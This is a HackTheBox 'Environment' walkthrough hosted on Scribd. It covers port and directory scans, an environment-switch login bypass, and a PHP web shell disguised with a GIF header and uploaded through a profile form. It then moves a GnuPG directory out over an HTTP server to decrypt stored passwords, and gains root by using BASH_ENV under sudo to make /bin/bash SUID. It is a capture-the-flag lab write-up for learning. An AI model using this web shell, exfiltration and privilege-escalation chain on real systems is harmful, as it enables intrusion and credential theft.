Scribd
Upload
7K views3 pages

HackTheBox Environment Walkthrough

The document outlines a penetration testing scenario involving the environment.htb server, detailing the services running, including SSH and HTTP. It describes exploiting a vulnerability to gain access to the user 'hish', retrieving sensitive information, and ultimately escalating privileges to root. The process includes uploading a web shell, executing commands, and manipulating file permissions to achieve root access.

Uploaded by

21r21a6238
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
7K views3 pages

HackTheBox Environment Walkthrough

The document outlines a penetration testing scenario involving the environment.htb server, detailing the services running, including SSH and HTTP. It describes exploiting a vulnerability to gain access to the user 'hish', retrieving sensitive information, and ultimately escalating privileges to root. The process includes uploading a web shell, executing commands, and manipulating file permissions to achieve root access.

Uploaded by

21r21a6238
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Environment

Nmap scan report for [Link] ([Link])


Host is up (0.25s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u5 (protocol 2.0)
| ssh-hostkey:
| 256 [Link] (ECDSA)
|_ 256 [Link] (ED25519)
80/tcp open http nginx 1.22.1
|_http-title: Save the Environment | [Link]
|_http-server-header: nginx/1.22.1
8000/tcp open http-alt?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

echo "[Link] [Link]" | sudo tee -a /etc/hosts

gobuster dir -u [Link] -w /usr/share/wordlists/dirb/[Link]


/build (Status: 301) [Size: 169] [--> [Link]
/[Link] (Status: 200) [Size: 0]
/[Link] (Status: 200) [Size: 4602]
/logout (Status: 302) [Size: 358] [--> [Link]
/login (Status: 200) [Size: 2391]
/[Link] (Status: 200) [Size: 24]
/storage (Status: 301) [Size: 169] [--> [Link]
/up (Status: 200) [Size: 2126]
/vendor (Status: 301) [Size: 169] [--> [Link]

Go to login page
triggering remember parameter to error (&remember=') disclosures env name: preprod

[Link]
so with this PoC, go to login page, write some random data, intercept the request and add ?--env=preprod and forward it.
So it will redirect you straight dashboard of Hish user.

save this webshell as [Link].


IMPORTANT: adding dot after php and adding allowed file's header at the top .
Go to profile section, upload it:

GIF87a
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="cmd" id="cmd" size="80">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>
[Link]("cmd").focus();
</script>
</html>

U will get shell of www-data:

cat /home/hish/[Link]

bash-5.2$ ls /home/hish
backup [Link]
bash-5.2$ ls /home/hish/backup/
[Link]

cd /home/backup
python3 -m [Link] 8080
wget [Link]:8080/[Link]

cd ../
tar -czf /tmp/[Link] ./.gnupg
cd /tmp
python3 -m [Link] 8080

wget [Link]:8080/[Link]
tar -xzf [Link]
mv ~/.gnupg ~/Documents # save our .gnupg
mv .gnupg ~/ # replace hish gnupg to our home dir
gpg --decrypt [Link]
gpg: WARNING: unsafe permissions on homedir
gpg: encrypted with rsa2048 key, ID B755B0EDD6CFCFD3, created 2025-01-11`
"hish_ <hish@[Link]>"
[Link] -> Ihaves0meMon$yhere123
[Link] -> marineSPm@ster!!
[Link] -> summerSunnyB3ACH!!

ssh hish@[Link]
marineSPm@ster!!

For Root

-bash-5.2$ sudo -l
Matching Defaults entries for hish on environment:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+="ENV
BASH_ENV", use_pty
User hish may run the following commands on environment:
(ALL) /usr/bin/systeminfo

echo -e '#!/bin/bash\nchmod +s /bin/bash' > [Link]


chmod 777 [Link]
sudo BASH_ENV=[Link] /usr/bin/systeminfo

/bin/bash -p
cat /root/[Link]

You might also like